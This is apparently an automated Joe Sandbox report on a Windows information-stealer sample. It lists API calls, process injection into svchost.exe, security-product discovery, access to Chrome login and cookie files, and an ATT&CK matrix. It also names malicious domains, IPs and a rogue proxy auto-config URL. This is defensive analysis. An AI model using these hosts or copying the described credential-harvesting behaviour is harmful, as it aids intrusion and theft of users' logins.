        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463AE60 Sleep,CloseHandle,InitializeSecurityDescriptor,AllocateAndInitializeSid,UnmapViewOfFile,GetLengthSid,GetProcessHeap,RtlAllocateHeap,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,FreeSid,GetProcessHeap,HeapFree,5_2_0463AE60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463AE60 Sleep,CloseHandle,InitializeSecurityDescriptor,AllocateAndInitializeSid,UnmapViewOfFile,GetLengthSid,GetProcessHeap,RtlAllocateHeap,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,FreeSid,GetProcessHeap,HeapFree,5_2_0463AE60
        Source: svchost.exe, 00000009.00000002.788123710.00000067B64FE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004071DC
        Source: C:\Users\user\Desktop\file.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_0040798E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004065CF cpuid 0_2_004065CF
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404529 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00404529
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040185D GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,___crtGetCommandLineW,___crtGetEnvironmentStringsW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit,0_2_0040185D
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

        Stealing of Sensitive Information

        barindex
        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.dbJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies.dbJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04653DA0 WSAGetLastError,socket,WSAGetLastError,WSAIoctl,WSAGetLastError,htons,bind,WSAGetLastError,5_2_04653DA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0464DB70 htons,bind,bind,InterlockedIncrement,InterlockedIncrement,InterlockedIncrement,5_2_0464DB70
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5564C0 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,7_2_0000022BAF5564C0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF558260 WSAGetLastError,socket,htons,bind,WSAGetLastError,7_2_0000022BAF558260
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF550DF0 htons,bind,7_2_0000022BAF550DF0
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Valid Accounts
        111
        Windows Management Instrumentation
        1
        Create Account
        1
        Valid Accounts
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium2
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts2
        Native API
        1
        Valid Accounts
        11
        Access Token Manipulation
        1
        Deobfuscate/Decode Files or Information
        1
        Network Sniffing
        1
        System Service Discovery
        Remote Desktop Protocol1
        Man in the Browser
        Exfiltration Over Bluetooth11
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts12
        Service Execution
        11
        Windows Service
        11
        Windows Service
        2
        Obfuscated Files or Information
        11
        Input Capture
        3
        File and Directory Discovery
        SMB/Windows Admin Shares1
        Data from Local System
        Automated Exfiltration3
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)1
        Bootkit
        822
        Process Injection
        1
        Install Root Certificate
        NTDS1
        Network Sniffing
        Distributed Component Object Model11
        Input Capture
        Scheduled Transfer14
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Software Packing
        LSA Secrets37
        System Information Discovery
        SSH2
        Clipboard Data
        Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        File Deletion
        Cached Domain Credentials481
        Security Software Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items11
        Masquerading
        DCSync12
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Valid Accounts
        Proc Filesystem3
        Process Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        Modify Registry
        /etc/passwd and /etc/shadow1
        Application Window Discovery
        Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)12
        Virtualization/Sandbox Evasion
        Network Sniffing1
        Remote System Discovery
        Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron11
        Access Token Manipulation
        Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
        Compromise Software Supply ChainUnix ShellLaunchdLaunchd822
        Process Injection
        KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
        Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled Task1
        Bootkit
        GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
        Trusted RelationshipPythonHypervisorProcess Injection1
        Rundll32
        Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement
        Hardware AdditionsJavaScript/JScriptValid AccountsDynamic-link Library Injection1
        Indicator Removal on Host
        Credential API HookingSystem Information DiscoveryExploit Enterprise ResourcesRemote Email CollectionAlternate Network MediumsExternal ProxyExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 700949 Sample: file.exe Startdate: 11/09/2022 Architecture: WINDOWS Score: 100 63 Multi AV Scanner detection for domain / URL 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Antivirus detection for URL or domain 2->67 69 2 other signatures 2->69 8 rundll32.exe 2->8         started        10 file.exe 2 2->10         started        process3 signatures4 13 rundll32.exe 3 8->13         started        87 Creates processes via WMI 10->87 16 file.exe 3 10->16         started        20 conhost.exe 10->20         started        process5 dnsIp6 89 Contains functionality to infect the boot sector 13->89 91 Contains functionality to inject threads in other processes 13->91 93 Contains functionality to inject code into remote processes 13->93 95 5 other signatures 13->95 22 svchost.exe 1 13->22 injected 25 svchost.exe 13->25 injected 27 svchost.exe 13->27 injected 32 16 other processes 13->32 47 104.21.40.196, 443, 49725 CLOUDFLARENETUS United States 16->47 49 v.xyzgamev.com 172.67.188.70, 443, 49724 CLOUDFLARENETUS United States 16->49 41 C:\Users\user\AppData\Local\Temp\db.dll, PE32 16->41 dropped 30 conhost.exe 16->30         started        file7 signatures8 process9 dnsIp10 79 System process connects to network (likely due to code injection or exploit) 22->79 81 Contains functionality to inject threads in other processes 22->81 83 Sets debug register (to hijack the execution of another thread) 22->83 85 4 other signatures 22->85 34 svchost.exe 12 14 22->34         started        39 WMIADAP.exe 4 25->39         started        57 8.238.85.254 LEVEL3US United States 27->57 59 20.199.120.151 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 32->59 61 20.199.120.182 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 32->61 signatures11 process12 dnsIp13 51 g.agametog.com 34.142.181.181 ATGS-MMD-ASUS United States 34->51 53 208.95.112.1 TUT-ASUS United States 34->53 55 104.21.34.132 CLOUDFLARENETUS United States 34->55 43 C:\Users\user\AppData\Local\...\Cookies.db, SQLite 34->43 dropped 45 C:\Users\user\AppData\Local\...\Login Data.db, SQLite 34->45 dropped 71 Query firmware table information (likely to detect VMs) 34->71 73 Installs new ROOT certificates 34->73 75 Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically) 34->75 77 Tries to harvest and steal browser information (history, passwords, etc) 34->77 file14 signatures15

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        file.exe10%ReversingLabs
        No Antivirus matches
        SourceDetectionScannerLabelLinkDownload
        19.2.svchost.exe.1b6d6000000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        27.2.svchost.exe.236f3940000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        30.2.svchost.exe.1e554740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        9.2.svchost.exe.244fc400000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        11.0.svchost.exe.2d6cb270000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        34.0.svchost.exe.1dd8fdb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        18.2.svchost.exe.1f97f120000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        22.2.svchost.exe.25139800000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        25.2.svchost.exe.195990b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        23.2.svchost.exe.226f8d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        20.0.svchost.exe.2468b5b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        25.0.svchost.exe.195990b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        7.2.svchost.exe.22baf530000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        18.0.svchost.exe.1f97f120000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        11.2.svchost.exe.2d6cb270000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        17.2.svchost.exe.1dbfc920000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        7.0.svchost.exe.22baf530000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        33.2.svchost.exe.23e495b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        23.0.svchost.exe.226f8d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        37.2.svchost.exe.12dbc510000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        19.0.svchost.exe.1b6d6000000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        29.2.svchost.exe.1f1ed200000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        28.0.svchost.exe.24e72070000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        35.2.svchost.exe.28291080000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        36.2.svchost.exe.151abe70000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        29.0.svchost.exe.1f1ed200000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        37.0.svchost.exe.12dbc510000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        30.0.svchost.exe.1e554740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        34.2.svchost.exe.1dd8fdb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        35.0.svchost.exe.28291080000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        22.0.svchost.exe.25139800000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        33.0.svchost.exe.23e495b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        9.2.svchost.exe.244fe400000.4.unpack100%AviraHEUR/AGEN.1239265Download File
        5.2.rundll32.exe.4630000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        17.0.svchost.exe.1dbfc920000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        32.2.svchost.exe.1af63d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        28.2.svchost.exe.24e72070000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        27.0.svchost.exe.236f3940000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        36.0.svchost.exe.151abe70000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        20.2.svchost.exe.2468b5b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        32.0.svchost.exe.1af63d40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
        SourceDetectionScannerLabelLink
        v.xyzgamev.com12%VirustotalBrowse
        SourceDetectionScannerLabelLink
        https:///xboxlive.com0%Avira URL Cloudsafe
        https://v.xyzgamev.com/911.html16%VirustotalBrowse
        http://35.236.159.79/win.pacAutoConfigURLSOFTWARE12%VirustotalBrowse
        https:///live.com0%Avira URL Cloudsafe
        https://v.xyzgamev.com/911.html100%Avira URL Cloudmalware
        https://p-api.com/json/?fields=81980%Avira URL Cloudsafe
        https://login.windows.net12DF70%Avira URL Cloudsafe
        https://pp.abcgameabc.com/0%Avira URL Cloudsafe
        https://v.xyzgamev.com/logo.png100%Avira URL Cloudmalware
        http://35.236.159.79/win.pacAutoConfigURLSOFTWARE100%Avira URL Cloudmalware
        https://pp.abcgameabc.com/api4.php0%Avira URL Cloudsafe
        https://pp.abcgameabc.com/api4.phpCH0%Avira URL Cloudsafe
        https:///windows.net0%Avira URL Cloudsafe
        https://login.windows.netory0%Avira URL Cloudsafe
        http://35.236.159.79/win.pac100%Avira URL Cloudmalware
        https://pp.abcgameabc.com/api4.phpy0%Avira URL Cloudsafe
        https://pp.abcgameabc.com/api4.phpSTEM0%Avira URL Cloudsafe
        https://xsts.auth.xboxlive.com20%Avira URL Cloudsafe
        https://login.windows.net10020%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        v.xyzgamev.com
        172.67.188.70
        truefalseunknown
        g.agametog.com
        34.142.181.181
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://v.xyzgamev.com/911.htmltrue
          • 16%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          https://v.xyzgamev.com/logo.pngtrue
          • Avira URL Cloud: malware
          unknown
          https://pp.abcgameabc.com/api4.phpfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://login.windows.netsvchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            http://35.236.159.79/win.pacAutoConfigURLSOFTWAREsvchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmpfalse
            • 12%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            https:///xboxlive.comsvchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            http://www.google.com/Psvchost.exe, 00000013.00000000.318145699.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.790922595.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.322130353.000001B6D541F000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              https://xsts.auth.xboxlive.comsvchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid9.9mverp=https://pp.svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://pp.abcgameabc.com/svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://login.windows.net12DF7svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://p-api.com/json/?fields=8198svchost.exe, 00000009.00000002.795608571.00000244FC25B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https:///live.comsvchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  https://login.windows.net/svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    https://pp.abcgameabc.com/api4.phpCHsvchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://login.windows.netorysvchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ip-api.com/json/?fields=8198svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https:///windows.netsvchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://35.236.159.79/win.pacsvchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://pp.abcgameabc.com/api4.phpysvchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://pp.abcgameabc.com/api4.phpSTEMsvchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.instagram.com/accounts/edit/svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://login.windows.net/2DF7svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://login.windows.net1002svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://xsts.auth.xboxlive.com2svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://xsts.auth.xboxlive.com/svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.34.132
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            20.199.120.182
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            208.95.112.1
                            unknownUnited States
                            53334TUT-ASUSfalse
                            8.238.85.254
                            unknownUnited States
                            3356LEVEL3USfalse
                            172.67.188.70
                            v.xyzgamev.comUnited States
                            13335CLOUDFLARENETUSfalse
                            104.21.40.196
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            34.142.181.181
                            g.agametog.comUnited States
                            2686ATGS-MMD-ASUStrue
                            20.199.120.151
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:700949
                            Start date and time:2022-09-11 10:15:18 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 14m 8s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:file.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:24
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:19
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.bank.troj.spyw.evad.winEXE@11/6@4/8
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 70.9% (good quality ratio 62.1%)
                            • Quality average: 65.9%
                            • Quality standard deviation: 34%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 36
                            • Number of non-executed functions: 408
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.50.105.163
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            10:16:26API Interceptor4x Sleep call for process: file.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            104.21.34.132file.exeGet hashmaliciousBrowse
                              R2axoid4If.exeGet hashmaliciousBrowse
                                x9rKinpIYb.exeGet hashmaliciousBrowse
                                  RSg2UWbVWV.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      LBPv87JqjI.exeGet hashmaliciousBrowse
                                        AHy2heusTp.exeGet hashmaliciousBrowse
                                          72JrEIo9FX.exeGet hashmaliciousBrowse
                                            mLtELLXIJs.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.W32.Mokes.G.genEldorado.9275.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.W32.Mokes.G.genEldorado.4480.exeGet hashmaliciousBrowse
                                                  k2PpV0RYpk.exeGet hashmaliciousBrowse
                                                    Duo2PmRglS.exeGet hashmaliciousBrowse
                                                      RPz3lObFvu.exeGet hashmaliciousBrowse
                                                        rPYoKSaOOP.exeGet hashmaliciousBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          v.xyzgamev.comfile.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          D3DE52EC5E00EFF831E15A2719C702F98FBCF95183849.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          fJe9em23BB.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          9A7cFpND1m.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          Xna4BTaBin.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.188.70
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          BpG12M3con.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.21.40.196
                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          CLOUDFLARENETUSvzZ0bmI6GU.exeGet hashmaliciousBrowse
                                                          • 104.20.68.143
                                                          JrsIxxAVOO.exeGet hashmaliciousBrowse
                                                          • 162.159.129.233
                                                          DzLLDATubf.exeGet hashmaliciousBrowse
                                                          • 172.67.34.170
                                                          Bjfjv.exeGet hashmaliciousBrowse
                                                          • 162.159.134.233
                                                          Xuuhjfado.exeGet hashmaliciousBrowse
                                                          • 162.159.129.233
                                                          file.exeGet hashmaliciousBrowse
                                                          • 162.159.134.233
                                                          https://sportdush.ru/Get hashmaliciousBrowse
                                                          • 172.67.8.174
                                                          http://www.pandoracharms.cc/Get hashmaliciousBrowse
                                                          • 172.67.166.165
                                                          http://www.pandoracharms.cc/%20%20http://www.pictaram.com/tag/zaferak%C4%B1nc%C4%B1%20http://www.pictaram.com/user/magazingunlugu/3880874914/1470930459377979259_3880874914Get hashmaliciousBrowse
                                                          • 104.17.167.186
                                                          file.exeGet hashmaliciousBrowse
                                                          • 162.159.129.233
                                                          file.exeGet hashmaliciousBrowse
                                                          • 104.26.0.100
                                                          file.exeGet hashmaliciousBrowse
                                                          • 172.67.34.170
                                                          Install.exeGet hashmaliciousBrowse
                                                          • 172.65.251.78
                                                          GU.exeGet hashmaliciousBrowse
                                                          • 104.20.67.143
